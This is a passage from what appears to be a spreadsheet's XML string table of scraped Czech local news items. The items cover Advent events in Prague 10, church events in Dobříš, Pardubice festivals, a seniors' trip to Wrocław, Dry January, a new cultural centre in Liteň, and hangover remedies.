    <t>Vánoce na desítce byly opět kouzelné Vánoce na Praze 10 byly letos opět pestré a nabídly bohatý program, který spojil tradice, kulturu i sousedské setkávání. Slavnostní rozsvěcení vánočních stromků na Kubánském náměstí, nám. Sv. Čecha a dalších místech zahájilo období adventu za doprovodu koled a světelných efektů, což vytvořilo přátelskou atmosféru pro stovky návštěvníků. Kostel sv. Václava hostil tradiční adventní koncert s vystoupením místních sborů a sólistů, kteří obohatili adventní program o klasické i moderní skladby. Náměstí Svatopluka Čecha se od 15. do 22. prosince proměnilo ve vánoční městečko. Každý den nabízel rukodělné dílny, kde si návštěvníci mohli vyrobit vánoční dekorace nebo psát svá přání Ježíškovi. Hudební vystoupení místních i známých umělců pak rozezpívala celé náměstí. Závěrečná událost byla spojena s příchodem betlémského světla, které skauti předávali přítomným, aby si mohli domů odnést symbol míru a naděje. Adventní dílny na dalších místech Prahy 10 nabízely kreativní aktivity jako výrobu šperků z korálků či dřevěných ozdob. Zároveň se organizovaly akce zaměřené na seniory, včetně tematických workshopů a vánočních setkání, které zdůraznily význam solidarity a sousedské pomoci. Celý advent byl důkazem toho, že lze vytvořit srdečnou sváteční atmosféru, která spojila lidi v radosti, sdílení a opravdové vánoční pohodě. Adventní koncert v kostele sv. Václava Rozsvěcení hlavního vánočniího stromu na Čechově náměstí Rozsvěcení vánočních stromků na Kubáňském náměstí Otevření vánoční vesničky na náměstí Svatopluka Čecha Otevření vánoční vesničky na náměstí Svatopluka Čecha</t>
  </si>
  <si>
    <t>20250101_423_3714202879_3bbafc44a7b992064e28.html</t>
  </si>
  <si>
    <t>3bbafc44a7b992064e28</t>
  </si>
  <si>
    <t>Pastorační centrum sv. Tomáše srdečně zve na tyto lednové akce</t>
  </si>
  <si>
    <t>Pastorační centrum sv. Tomáše srdečně zve na tyto lednové akce 5. ledna v 17 hod. – Srdečně vás zveme na již tradiční Tříkrálový koncert dobříšského chrámového sboru, který se uskuteční v neděli 5. ledna v 17 hodin v Pastoračním centru sv. Tomáše , kde zazní krásné vánoční písně a koledy nejen z Čech . K tomu okusíme drobné vánoční dobroty a společně snad vytvoříme příjemnou vánoční atmosféru. Těšíme se na vás. (Vstupné dobrovolné.) 19. ledna v 10.15 – Vernisáž výstavy „Krajinou křížů“ Spolku pro obnovu drobných sakrálních objektů. Fotografie provedou návštěvníky obnovenými kříži z Rosovic a okolí. Výstava bude ke zhlédnutí v pastoračním centru do 9. února. 23. ledna v 17.15 – Medjugorský modlitební večer v dobříšském kostele Nejsvětější Trojice. Na programu je nejprve modlitba růžence, poté mše svatá a nakonec krátká adorace ve vyhřívaných lavicích. Předpokládaný konec je v 19.15. 24. ledna v 19.30 – Již tradiční ekumenická bohoslužba s Českobratrskou církví evangelickou v pastoračním centru v rámci Týdne modliteb za jednotu křesťanů. Po společné bohoslužbě bude následovat pohoštění a popovídání nad sklenkou vína . Autor: Veronika Tetuová Autor person Veronika Tetuová</t>
  </si>
  <si>
    <t>20250101_424_3734758702_7fff61a94dcf0e5ba997.html</t>
  </si>
  <si>
    <t>7fff61a94dcf0e5ba997</t>
  </si>
  <si>
    <t>PARDUBIČTÍ TAHOUNI</t>
  </si>
  <si>
    <t>PARDUBIČTÍ TAHOUNI 14 nejlepších akcí v Pardubicích . Buď u toho! Pardubičtí tahouni vás vtáhnou do akce! Ikonické památky, malebná zákoutí, parky, zajímavé historické osobnosti či pohodové kavárničky a restaurace... Ano, to vše Pardubice nabízejí. Co si však město dlouhodobě hýčká jako své „rodinné zlato“ je spojení tradičních unikátních akcí, které nejsou v této podobě k vidění nikde jinde a přitahují pozornost návštěvníků ze širokého okolí i ze zahraničí. Tyto top akce mají více než desetiletou tradici, některé z nich i mnohem delší a nalézt mezi nimi můžete i nejstarší svého druhu v Evropě . Repertoár se prolíná napříč všemi žánry – divadlo, klasická hudba, folklór, sport v nejrůznějších podobách, letecká akrobacie, ale také motorky a ikoničtí koně. Nechte se přitáhnout i vy! Věřte, že v Pardubicích se budete cítit jako na koni! www.tahouni.eu GRAND FESTIVAL SMÍCHU 25. ročník soutěžní přehlídky nejlepších komedií českých a moravských profesionálních divadel Místo konání: Východočeské divadlo Pardubice (Městské divadlo, Malá scéna, Poedium v klubu) Termín: 21. 1. – 28. 1. 2025 www.festivalsmichu.cz PARDUBICKÉ 2 HUDEBNÍ JARO 47. ročník mezinárodního hudebního festivalu Místo konání: Sukova síň Domu hudby, kostel sv. Bartoloměje, Zámek Pardubice , Gočárova galerie v Automatických mlýnech Termín: 30. 3. – 31. 5. 2025 www.pardubickehudebnijaro.cz PARDUBICKÝ VINAŘSKÝ 3 PŮLMARATON 19. ročník mezinárodního běžeckého závodu Místo konání: Pernštýnské náměstí, ulice města Termín: 19. 4. 2025 www.pardubickyvinarskypulmaraton.cz AVIATICKÁ POUŤ PARDUBICE 33. ročník mezinárodní airshow s bohatým doprovodným programem Místo konání: Letiště Pardubice Termín: 7. – 8. 6. 2025 www.aviatickapout.cz FOLKLÓRNÍ FESTIVAL 5 PARDUBICE – HRADEC KRÁLOVÉ – Pernštýnská noc 6. 6. 33. ročník folklórního festivalu s jarmarkem v kulisách historického centra města Místo konání: Pernštýnské nám., historické centrum Termín: 6. – 8. 6. 2025 www.folklornifestival.cz MĚSTSKÉ SLAVNOSTI – 6 ZRCADLO UMĚNÍ 24. ročník jarní části Městských slavností, multižánrový festival amatérské kultury regionu Místo konání: Pernštýnské náměstí, ulice města Termín: 11. – 12. 6. 2025 www.zrcadloumeni.eu CZECH OPEN 36. ročník mezinárodního festivalu šachu a her Místo konání: Kongresové centrum IDEON Termín: 17. 7. – 3. 8. 2025 www.czechopen.net PARDUBICKÁ JUNIORKA 98. ročník mistrovství ČR v kategorii staršího dorostu v tenise Místo konání: Kurty LTC Pardubice, Labská ul. Termín: 9. – 15. 8. 2025 www.pardubickajuniorka.cz SPORTOVNÍ PARK 9 PARDUBICE Unikátní sportovní festival pro malé i velké návštěvníky – 9 dní plných sportu v Parku na Špici Místo konání: Park na Špici Termín: 2. – 10. 8. 2025 www.sportovnipark.cz PARDUBICKÁ VINAŘSKÁ 10 NOC – PARDUBICKÝ FESTIVAL VÍNA 28. ročník oblíbeného festivalu s prezentací vinařské produkce z Čech , Moravy i celého světa v kulisách pardubického zámku Místo konání: Zámek Pardubice Termín: 29. – 30. 8. 2025 www.pardubickyfestivalvina.cz RETROMĚSTEČKO 11 (nejen) ČSLA, setkání hasičů a bezpečnostních složek BÁJEČNÝ VÍKEND plný tradic, zábavy, s vývojem průmyslu, oborů a bezpečnosti státu Termín: 13. – 14. 9. 2025 www.retromestecko.cz ZLATÁ PŘILBA 77. ročník mezinárodních motocyklových plochodrážních závodů Místo konání: Plochodrážní stadion Svítkov Termín: 19. – 21. 9. 2025 www.zlataprilba.cz MĚSTSKÉ SLAVNOSTI – PODZIMNÍ ČÁST 31. ročník multižánrového festivalu s tradičním lampionovým průvodem Místo konání: Pernštýnské náměstí, historické centrum města Termín: 10. – 11. 10. 2025 www.pardubice.eu VELKÁ PARDUBICKÁ SE SLAVIA POJIŠŤOVNOU 135. ročník slavného překážkového dostihu Místo konání: Pardubické závodiště Termín: 12. 10. 2025 www.zavodistepardubice.cz</t>
  </si>
  <si>
    <t>20250101_425_3734785692_caf3e10b1e7a180957bd.html</t>
  </si>
  <si>
    <t>caf3e10b1e7a180957bd</t>
  </si>
  <si>
    <t>JE SOUČASNÝ ČESKÝ RAP TAK JINÝ?</t>
  </si>
  <si>
    <t>20250101_426_3744801763_035a57979ba96c81ce35.html</t>
  </si>
  <si>
    <t>035a57979ba96c81ce35</t>
  </si>
  <si>
    <t>A JE TU NOVÝ ROK</t>
  </si>
  <si>
    <t>A JE TU NOVÝ ROK Užili jsme si vánoční svátky, nasadili dietu po svátečních dobrotách a otočili poslední list v kalendáři. To je jistě důvodem k zhodnocení naší společné činnosti v uplynulém roce a také k přípravě na rok budoucí. Doufejme, že také úspěšný, prožitý v pohodě, a hlavně ve zdraví. Předposlední akcí loňského roku byl autobusový zájezd do polské adventní Vratislavy. Ač jsme již toto nádherné město v minulosti navštívili, letos nás přivítalo zcela jinou, sváteční atmosférou. Prohlídku jsme začali na pobřeží řeky Odry , kde se na Tumském ostrově tyčí mimo jiné církevní stavby i katedrála svatého Jana Křtitelé . Našli jsme také „knedlíček“, který utekl svému majiteli před zkonzumováním a usadil se na brance před botanickou zahradou. Pokračovali jsme do centra města. Udělali jsme krátkou zastávku v městské tržnici, kde jsme obdivovali spoustu ovoce, zeleniny i masných výrobků. Za zvláštní pozornost stály i nádherné květinové vazby, které jsme obdivovali i na jiných místech. Dokráčeli jsme na „Rynek“, hlavní náměstí , které je obklopeno nádhernými historickými domy, mezi kterými vynikají dva malé domečky nazvané Jeníček a Mařenka. Uprostřed náměstí je nádherná stavba středověké radnice, která vévodí adventní tržnici s více jak dvěma sty stánků se vším možným, ale i nemožným. Vůni adventních dobrot doplňovaly různé řemeslné výrobky typické pro Polsko . Na malém sousedním náměstí jsme opět mohli obdivovat spoustu květinových vazeb v květinářský stáncích. Ochutnali jsme místní speciality, např. pirohy s různou náplní, typické klobásy a také místní obdobu svařeného vína . Celou dobu jsme byli pod dohledem trpaslíků – krasnale, jejichž sošky, je jich snad i tisíc, jsou umístěny na všech možných i nemožných místech. Jeden musí dávat pozor, aby se o ně „nepřerazil“. Zpáteční cesta svátečně osvětleným středem města jen umocnila hezký zážitek. Poslední akcí loňského roku byla naše členská schůze, tradičně konaná v restauraci U Potůčku v Harcově. Zhodnotili jsme uplynulý rok. Také jsme se domluvili na akcích, které bychom v novém roce rádi realizovali. Mimo běžné výlety bychom rádi vykonali autobusové zájezdy, a to do Česko saského Švýcarska z české i německé strany, do Krkonoš v Polsku s možným výstupem na Sněžku (z polské strany je to přístupnější), na třídenní zájezd do Krušných hor , zejména Jáchymov , Boží Dar a další. Na závěr pak na českou Loaru, tedy zámky na řece Orlici ve východních Čechách . O všech jednotlivých akcích vás budeme včas informovat. Takže již máme jasno a nezbývá než se těšit na lepší počasí a spoustu nových společných zážitků! Za spolek seniorů vám všem přeje úspěšný nový rok Antonín Ročňák</t>
  </si>
  <si>
    <t>20250101_427_3774755631_50fc0f52d204628a70f2.html</t>
  </si>
  <si>
    <t>50fc0f52d204628a70f2</t>
  </si>
  <si>
    <t>Suchý leden: Má smysl dát si v lednu pauzu od alkoholu?</t>
  </si>
  <si>
    <t>Suchý leden: Má smysl dát si v lednu pauzu od alkoholu ? Foto: Quadronet_Webdesign, Pixabay Přelom roku je pro mnohé obdobím předsevzetí, nových začátků a sebereflexe. Jedním z trendů, který každoročně získává na popularitě, je tzv. Suchý leden (Dry January) – měsíční výzva, kdy si lidé dávají pauzu od alkoholu . Může ale měsíc bez večerní sklenky vína či půllitru piva skutečně přinést pozitivní změny, nebo jde jen o další módní výstřelek? Alkohol je neodmyslitelnou součástí mnoha společenských aktivit, a proto představa kompletní abstinence může znít pro řadu lidí opravdu náročně. Přesto se ukazuje, že může mít Suchý leden řadu zdravotních, psychických i sociálních výhod – pokud na něj přistoupíte s realistickým přístupem a dobře se připravíte. Co je Suchý leden? Suchý leden, iniciovaný organizací Alcohol Change UK v roce 2013, je globální výzva k tomu, aby lidé alespoň na jeden měsíc omezili konzumaci alkoholu . Cílem není jen detoxikace, ale také zamyšlení nad svými návyky a možnost vyzkoušet si život bez alkoholu . Výzva láká nejen pravidelné konzumenty, ale i ty, kteří chtějí po vánočních oslavách a silvestrovském přípitku dát svému tělu prostor na oddech. Jaké jsou přínosy abstinence? Výzkumy i zkušenosti těch, kteří Suchý leden vyzkoušeli, potvrzují, že i krátká pauza od alkoholu může mít výrazný pozitivní dopad na tělo i mysl. Jedním z nejvýznamnějších přínosů je zlepšení kvality spánku. Ačkoli alkohol může působit jako sedativum a pomáhat usnout, ve skutečnosti narušuje hluboké fáze spánku. Po několika dnech abstinence si lidé často všimnou, že se cítí odpočatější a mají více energie. Dalším benefitem je snížení hmotnosti. Alkoholické nápoje jsou často plné kalorií a přispívají k přejídání. Bez alkoholu tak mnozí zaznamenají nejen úbytek na váze, ale i lepší trávení a menší pocit nadýmání. Pozitivní dopady se projevují také na fyziologické úrovni – játra, která zpracovávají alkohol , dostávají prostor na regeneraci. Už po měsíci abstinence dochází k výraznému zlepšení jejich funkce, stejně jako ke snížení hladiny cukru v krvi a krevního tlaku. Nevýhody a rizika Přestože Suchý leden přináší řadu benefitů, tato výzva není pro každého. Protože alkohol je obvykle vnímán jako nedílná součást oslav, posezení s přáteli nebo rodinných večeří, pro někoho může být obtížné čelit sociálnímu tlaku. Být „ten, kdo nepije“, může vyvolat otázky, obavy nebo dokonce odmítání okolí, což může být demotivující. Foto: ELEVATE, Pexels Pro lidi, kteří konzumují alkohol ve velkém množství, může být náhlá abstinence zdravotně riziková. Těžcí pijáci by se proto měli před zahájením výzvy poradit s lékařem. Dalším potenciálním rizikem je přílišná rigidita v přístupu k výzvě. Pokud si například stanovíte nereálná očekávání a „selžete“, může to vést k pocitům zklamání nebo viny, což je přesně opačný efekt, než jaký má výzva vyvolat. Jak úspěšně zvládnout měsíc bez alkoholu ? Klíčem k úspěchu je dobrá příprava a realistický přístup. Nejprve je důležité si uvědomit, proč chcete výzvu podstoupit. Možná je to zdravotní důvod, možná zvědavost, nebo jen chuť na změnu. Pokud máte jasný cíl, bude snazší u něj vytrvat. Připravte si také alternativy. Pokud jste zvyklí pít víno k večeři nebo pivo s přáteli, zkuste místo toho nealkoholické nápoje. Dnes existuje široká nabídka nealkoholických piv , vín nebo koktejlů, které chutnají výborně a navozují podobný zážitek, aniž by obsahovaly alkohol . I podpora okolí může být klíčová. Sdílejte své rozhodnutí s rodinou, přáteli nebo kolegy. Možná se někdo k výzvě přidá a budete se navzájem motivovat. Pokud se však setkáte s nepochopením, nenechte se odradit – pamatujte, že výzvu děláte pro sebe, ne pro ostatní. V neposlední řadě je důležitá odměna. Pokud se vám daří dodržovat svůj plán, najděte způsoby, jak se ocenit. Může to být nová kniha, návštěva wellness nebo jakýkoli jiný zážitek, který vám udělá radost. Co si z toho odnést po zbytek roku? Suchý leden nemusí být jen jednorázovou výzvou, ale také impulsem ke změně dlouhodobých návyků. Po skončení měsíce si mnoho lidí uvědomí, že se jejich vztah k alkoholu změnil. Někteří se rozhodnou pít méně, jiní si z alkoholu udělají pouze příležitostnou záležitost. Zároveň se také naučí lépe rozpoznávat, kdy si alkohol dopřávají z opravdové chuti, a kdy jen ze zvyku nebo kvůli tlaku okolí. Tato výzva může být začátkem cesty k vědomějšímu životnímu stylu. Ať už se rozhodnete pro Suchý leden z jakéhokoli důvodu, jedno je jisté – měsíc bez alkoholu vám dá prostor nejen pro regeneraci těla, ale i pro zamyšlení nad tím, jak si udržet zdravější a vyváženější přístup po celý rok. Autor: Food &amp;amp; Travel team Rubrika transition_slide Food &amp;amp; Travel</t>
  </si>
  <si>
    <t>20250101_428_3765197590_c6f0a419f2769cc0eac2.html</t>
  </si>
  <si>
    <t>c6f0a419f2769cc0eac2</t>
  </si>
  <si>
    <t>V Litni mají nově kino, divadlo i koncerty na jednom místě!</t>
  </si>
  <si>
    <t>V Litni mají nově kino, divadlo i koncerty na jednom místě! 1. 1. 2025 Liběna Nová PR Když budete chtít vyrazit za kulturou, doporučujeme Liteň. Od půlky prosince zde mají nové kulturní centrum, které netrpělivě očekávali dospělí i děti. Nabízí totiž filmy, divadlo, rodinnou kavárnu a knihovnu. Prostory se rychle staly srdcem místní komunity a postupně si získávají i „přespolní“. Z pozice kmotra na ně dohlíží oblíbený herec Matouš Ruml , jak prozradil Milan Nygrýn. Proč centrum vzniklo? Chtěli jsme vytvořit multifunkční prostor pro širokou veřejnost, který rozpohybuje kulturní a společenský život v Litni a okolí. Plánujeme pestrý program, od filmových a divadelních představení přes koncerty po přednášky, workshopy a komunitní akce. Cílem je zábava pro celou rodinu a jednotlivce bez ohledu na věk. Rádi bychom, aby se zde přirozeně setkávali místní i lidé z dalších obcí, relaxovali a nacházeli inspiraci. A třeba také uspořádali rodinnou oslavu, pro niž máme speciální místnost. Jak na otevření reagovala veřejnost? Vesměs nadšeně. Lidé uvítali samotnou rekonstrukci i detaily, třeba velmi příjemný koberec či komfortní sedadla zvaná loveseats, která znásobí kulturní zážitek, ale dopřát si ho můžete spíše jen v multikinech. A úplně nejvíce je překvapilo moderní vybavení kavárny s opravdu promyšlenou nabídkou a pohodovou atmosférou. Kavárna se vám tedy skutečně povedla?! Jsme na ni pyšní. V příjemném prostředí si dáte skvělou kávou, na jejíž přípravě si obzvlášť zakládáme. Slané i sladké dobroty pocházejí od lokálních dodavatelů, kteří je vyrábějí z poctivých surovin. Nechybí domácí limonády, čaje a v zimě samozřejmě svařené víno nebo oblíbené bombardino, každoroční hit zimní sezony, který zahřeje a osladí život. Pokud ale dáváte přednost vínu, dle nálady a chuti si můžete dát bílé, růžové či červené, přičemž některá jsou i v bio kvalitě. Díky pochvalným reakcím návštěvníků víme, že jsme se trefili do černého, z čehož máme obrovskou radost! A protože jsme v budově kina, koupíte u nás i popcorn, domácí chipsy a další pochutiny. Kromě filmů z domácí i zahraniční produkce jsem slyšela o zábavných show… Ano, už v lednu odstartujeme populárním pořadem 7 pádů Honzy Dědka , v únoru k nám zavítá známý bavič Zdeněk Izer . V březnu se můžete těšit na vystoupení komika Lukáše Pavláska a v dubnu stand-up komičku Adélu Elbel . Další akce jsou v jednání. Kde koupím vstupenky? A jde to i online? Rozhodně, jdeme s dobou. Na webu je navíc pořídíte o něco výhodněji. Platit můžete kartou nebo rychlým převodem českých bank, Apple Pay a GPay . A pokud vyrazíte k nám na pokladnu, ani tam nepotřebujete hotovost. Jaké speciální projekce v kině plánujete? Například promítání pro seniory a maminky s dětmi, abychom vyšli vstříc všem generacím. Kromě toho chystáme tematické besedy, které přinesou zajímavé diskuse. Chceme podpořit i místní umělce, školy a další organizace se zájmem o uspořádání jejich vlastních veřejných vystoupení nebo akcí tak, aby vznikl otevřený prostor, kde se bude rozvíjet kreativita a spolupráce v naší komunitě. Navázat hlubší vztahy s místními spolky a společně ladit pestrý a atraktivní program odrážející potřeby našeho regionu. Napadá mě, zda u vás pořídím poukaz, jímž mohu někoho obdarovat? I na to jsme mysleli. Máme dárkové karty v různých nominálních hodnotách. Skvělé je, že s nimi můžete platit na místě i online. Navíc se dají dobíjet, takže je využijete opakovaně. Z vlastní zkušenosti vím, že takový dárek ocení každý. Milovníci kultury, zaměstnanci… Co byste vašim (budoucím) návštěvníkům vzkázal? Přijďte se s námi ponořit do světa umění, zábavy a společných zážitků a spolu s námi vytvářet krásné vzpomínky. Jsme tu pro vás. A děkujeme, že vy jste tu s námi! Nebo brzy budete. KD Liteň Nádražní 401, Liteň tel.: 734 344 322 e-mail: info@kdliten.cz kdliten.cz FB: kinodivadlo_liten Otevírací doba kavárny a pokladny: Čtvrtek a pátek 15:00–22:00 Sobota 14:00–22:00 Neděle 14:00–20:00 Autor: Liběna Nová Autor person Liběna Nová Rubrika transition_slide PR</t>
  </si>
  <si>
    <t>123</t>
  </si>
  <si>
    <t>118</t>
  </si>
  <si>
    <t>20250101_429_3694386988_286d3a046f515d6e83b2.html</t>
  </si>
  <si>
    <t>286d3a046f515d6e83b2</t>
  </si>
  <si>
    <t>Na ranní kocovinu sice neexistuje zázračný lék, ale dá se aspoň zmírnit. Vsaďte na vodu, vývary a dostatek živin</t>
  </si>
  <si>
    <t>Na ranní kocovinu sice neexistuje zázračný lék, ale dá se aspoň zmírnit. Vsaďte na vodu, vývary a dostatek živin Sdílet Autor: Depositphotos Probudit se ráno s kocovinou rozhodně není nic příjemného. Bolestí hlavy, nevolností a únavou vám tělo dává najevo, že jste to s alkoholem zkrátka přehnali. Proto potřebuje určitý čas, aby se s toxickou dávkou vyrovnalo a alkohol odbouralo. S tímto procesem mu můžete pomoct tím, že se hydratujete, dáte si poctivý vývar, výživné jídlo a doplníte minerály. Pití alkoholu na večírku může být zábava, ale ranní bolest hlavy a nevolnost už určitě ne. Kocoviny se sice jen tak mrknutím oka nezbavíte, ale můžete si alespoň částečně ulevit. Dejte si bylinkový čaj, minerálku, banán nebo míchaná vajíčka. Zapomeňte na kávu nebo další alkohol , tím si akorát přitížíte. Co se dozvíte v článku Kongenery a jejich vliv na kocovinu Co je kocovina? Pokud se po bujarém večírku plném alkoholu probudíte s urputnou bolestí hlavy a nevolností, pravděpodobně máte silnou kocovinu. Kocovina je soubor příznaků, které se objevují po konzumaci velkého množství alkoholu . Obecně platí, že čím více alkoholu vypijete, tím je riziko kocoviny vyšší. Dostavuje se zpravidla až ve chvíli, kdy hladina alkoholu v krvi klesne na nízkou (či téměř nulovou) úroveň. Plnou silou na sebe příznaky kocoviny upozorní většinou až ráno po probuzení. Ženy a lidé, kteří nejsou zvyklí pít alkohol , mohou trpět závažnějšími projevy. Tento stav naštěstí většinou sám od sebe odezní do 24 hodin. Kocoviny se můžete zbavit rychleji, pokud tělu dodáte vodu, sacharidy a odpočinek. [ 1, 2, 3, 4 ] Jaké má kocovina příznaky? Dehydratace: při odbourávání alkoholu se v těle spotřebovává hodně vody. Zároveň se zvyšují i její ztráty, takže člověk více močí a potí se. Kvůli tomu dochází k dehydrataci, která se projevuje pocitem suchosti v ústech, žízní, bolestí hlavy, závratěmi a únavou. Zánětlivá reakce imunitního systému: nadměrný příjem alkoholu způsobuje, že imunitní buňky začnou produkovat cytokiny. Tyto látky mohou spouštět některé z projevů kocoviny, jako jsou bolesti hlavy, únava a nevolnost. Podrážděné trávení: alkohol stimuluje tvorbu žaludečních kyselin, což znamená, že je pak žaludek podrážděný. Při akutní intoxikaci alkoholem se navíc dostavuje obranný reflex v podobě zvracení. Bolest hlavy: jde o jeden z nejtypičtějších příznaků kocoviny, který je vyvolán několika mechanismy. Jedním z nich je rozšíření krevních cév (vazodilatace). Alkohol narušuje spánkový cyklus, čímž snižuje kvalitu spánku. Proto je běžné, že se pak po probuzení cítí člověk omámený a bolí ho hlava. Vyčerpání: nedostatek spánku, dehydratace a játra, která se místo výroby energie musí věnovat odbourávání alkoholu . To patří mezi hlavní faktory, proč se při kocovině cítíme unavení a podráždění. [ 5, 6, 7, 8 ] Co pomáhá na kocovinu? Pokud už trpíte kocovinou, musíte se smířit s následky svého chování a počítat s tím, že neexistuje žádný lék, který by vás tohoto utrpení během pár minut zbavil. Existuje ale několik postupů, které mohou dopady kocoviny na vaše tělo zmírnit. Tekutiny Prvním krokem, který povede k rychlejšímu zotavení z kocoviny, by mělo být doplnění tekutin s minerálními látkami. Kromě čisté vody vám udělají dobře minerálky, bylinkové čaje a rehydratační roztoky, které obsahují minerály v ideálních poměrech. Na doplnění tekutin jsou vynikající také polévky a masové vývary. Domácí kuřecí vývar s kořenovou zeleninou a nudličkami obsahuje vše, co tělo po kocovině potřebuje. Kromě vody je zdrojem kvalitních bílkovin, vitamínů, minerálů i sacharidů. Sacharidy Když člověk pije alkohol , zvyšuje se produkce kyseliny mléčné, což může vést ke snížení hladiny krevního cukru. To je ostatně jedním z důvodů, proč vás při kocovině bolí hlava a cítíte se vyčerpání. Aby se glykémie vrátila co nejrychleji do normálu, je nezbytné doplnit kvalitní sacharidy. Zkusit můžete cereálie, sladké ovoce nebo med. Ovoce by nemělo být kyselé, protože by mohlo podráždit citlivý žaludek. Dobrou volbou bude naopak banán, který zklidní zažívání a obsahuje hodně draslíku. [ 9, 10, 11, 12 ] Bílkoviny Další základní živinou, která vám pomůže zbavit se rychleji kocoviny, jsou bílkoviny. Dejte si třeba vajíčka, kuřecí maso, ovesné vločky nebo jiné jídlo bohaté na proteiny. Nachází se v nich totiž aminokyselina zvaná cystein, která játrům významně pomáhá s detoxikačními procesy. Minerály a vitamíny Kromě vody, sacharidů a bílkovin je nutné dodat tělu dostatek minerálů a vitamínů. Konkrétně třeba vitamín C je skvělý na zmírnění zánětlivých procesů v těle. Místo vymačkané pomerančové šťávy je ale lepší sáhnout třeba po mátovém čaji, abyste předešli dalšímu podráždění žaludku. Podle některých klinických studií se dají projevy kocoviny zmírnit také konzumací potravin bohatých na zinek a vitamíny skupiny B. Léky na kocovinu Od silné bolesti hlavy mohou ulevit volně prodejné léky proti bolesti ze skupiny nesteroidních antiflogistik (NSAID). Patří sem třeba ibuprofen, aspirin a naproxen. U těchto léků ale hrozí, že ještě více podráždí již tak rozbouřené prostředí žaludku. Rozhodně to s nimi tedy nepřehánějte. Po intoxikaci alkoholem se nesmí v žádném případě užívat paracetamol. V kombinaci s alkoholem by mohl způsobit vážné poškození jater. [ 13, 14, 15, 16 ] Co kocovinu zhoršuje? Silnou ranní kávu si mnoho lidí dopřává jako prostředek, který je po náročné noci postaví na nohy. Je pravda, že káva obsahuje stimulant v podobě kofeinu, což pomáhá proti otupělosti. Na druhou stranu působí diureticky, takže již tak dehydratovaný organismus ještě více odvodní. Káva je navíc kyselá, čímž překyselenému žaludku rozhodně nepomůžete. Kofein způsobuje dočasné stažení cév a zvyšuje krevní tlak, proto může vyvolat ještě horší bolesti hlavy. Místo kávy si dejte raději bylinkový čaj s medem. Střídmá konzumace alkoholu nepodporuje dlouhověkost. Pití je zdraví škodlivé Ještě horším nápadem by bylo dát si při kocovině vyprošťovák v podobě další dávky alkoholu . Když si dáte dalšího panáka, projevy kocoviny se tím sice na chvíli utlumí, ale jenom se tím vlastně oddálí. Až udeří kocovina v plné síle, budete se cítit ještě mnohem hůr, protože se tělo bude vyrovnávat s větší toxickou dávkou. [ 17, 18, 19, 20 ] Prevence kocoviny Nejspolehlivějším způsobem, jak se vyhnout kocovině, je abstinence. Co ale dělat, pokud jste citliví na alkohol , ale chcete si dopřát aspoň pár skleniček? Nepijte alkohol nalačno: alkohol se do krve vstřebává velice rychle. Tento proces můžete zpomalit tím, že si dáte před pitím vydatné a tučné jídlo. Mastnota vytvoří v žaludku tenkou ochrannou vrstvičku, která zmírní podráždění žaludeční sliznice a omezí vstřebávání alkoholu do krve. Prokládejte alkohol vodou: po každém vypitém drinku či skleničce si dejte sklenici čisté vody nebo minerálky. Díky tomu předejdete dehydrataci. Pijte pomalu a s mírou: drinky je vhodné popíjet pomalu a neházet je do sebe jeden za druhým. Pokud se do těla dostane velké množství alkoholu naráz, bude kocovina mnohem horší. Nemíchejte jednotlivé druhy alkoholu : pokud se rozhodnete pro jeden typ nápoje, nekombinujte ho později s dalšími. Mixování různých druhů alkoholu způsobí, že vám bude ráno mnohem hůř. Respektujte limity svého těla: každý člověk se vyrovnává s alkoholem trochu jinak. Zatímco někomu stačí ke kocovině dvě skleničky vína , jiný člověk může vypít bez problémů mnohem víc, aniž by mu bylo špatně. Obecně ale platí, že ženy jsou vůči působení alkoholu citlivější než muži. Kongenery a jejich vliv na kocovinu Důležitou roli hraje i výběr druhu alkoholu . Jednotlivé alkoholické nápoje se totiž liší obsahem tzv. kongenerů, což jsou látky, které mohou prohlubovat a zhoršovat kocovinu. Více kongerů najdete v červeném víně a tmavých likérech, jako jsou brandy a bourbon. Riziko nepříjemné ranní opice se tak dá snížit už tím, že sáhnete raději po bílém víně nebo čirém alkoholu (gin a vodka). [ 21, 22, 23, 24, 25 ] Zdroje: nih.gov, americanaddictioncenters.org, harvard.edu, webmd.com, mayoclinic.org, healthline.com, nature.com, pharmacytimes.com, muni.cz, szu.cz, bezpecnecesty.cz Autor: Dana Široká Autor Dana Široká</t>
  </si>
  <si>
    <t>4310</t>
  </si>
  <si>
    <t>20250101_43_3697448650_fa3a5264bb95040c32f4.html</t>
  </si>
  <si>
    <t>fa3a5264bb95040c32f4</t>
  </si>
  <si>
    <t>Záchranáři o Silvestru: Rušná noc plná úrazů, alkoholu a pyrotechniky</t>
  </si>
  <si>
    <t>Záchranáři o Silvestru: Rušná noc plná úrazů, alkoholu a pyrotechniky 12:17, Středa, 8. ledna 2025 Olomoucký kraj Jan Horejš; tisková zpráva - 14:20, Středa, 8. ledna 2025 Vláda bezplatně převede 17 obcím v Moravskoslezském a Olomouckém kraji, které zasáhly zářijové povodně, státní pozemky. O převodu dnes rozhodl kabinet, řekl na tiskové... Jan Horejš; tisková zpráva - 17:02, Úterý, 7. ledna 2025 Zářijové povodně vytvořily na území Olomouckého kraje přibližně 40 tisíc tun odpadu. Ten aktuálně leží na dvou deponiích na severu kraje. Hejtmanství proto vypsalo... Jan Horejš; tisková zpráva - 14:01, Úterý, 7. ledna 2025 Kdo jsou nejlepší lékaři v České republice ? Magazín Forbes publikoval žebříček padesátky nejlepších lékařů a lékařek z desítek oborů i nemocnic. Mezi nimi se... Jan Horejš; tisková zpráva - 11:45, Úterý, 7. ledna 2025 V prvním týdnu nového roku se zvýšil počet nemocných v Olomouckém kraji. Podle Krajské hygienické stanice narostl počet lidí s respiračním onemocněním o víc... Nejnovější Jan Horejš; tisková zpráva - 14:20, Středa, 8. ledna 2025 Vláda bezplatně převede 17 obcím v Moravskoslezském a Olomouckém kraji, které zasáhly zářijové povodně, státní pozemky. O převodu dnes rozhodl kabinet, řekl na tiskové... Jan Horejš; tisková zpráva - 14:13, Středa, 8. ledna 2025 Správa Chráněné krajinné oblasti Litovelské Pomoraví uzavřela jeskyni Podkova. Jeskyně v části Třesín totiž poskytuje přes zimu útočiště pro netopýry, kteří tu zimují. Správci... Jan Horejš; tisková zpráva - 13:25, Středa, 8. ledna 2025 Dobrovolní hasiči v Olomouci mají nové vybavení. Město jim věnovalo ochranné pomůcky, prostředky pro čerpání vody, pro práci na vodní hladině, poskytování první pomoci... Jan Horejš; tisková zpráva - 12:49, Středa, 8. ledna 2025 Nové kulturní a komunitní centrum vzniklo v další zrekonstruované části Lichtenštejnského dvora ve Slatinicích na Olomoucku. Oprava hospodářského stavení si vyžádala investici téměř 11... Jan Horejš; tisková zpráva - 14:00, Čtvrtek, 2. ledna 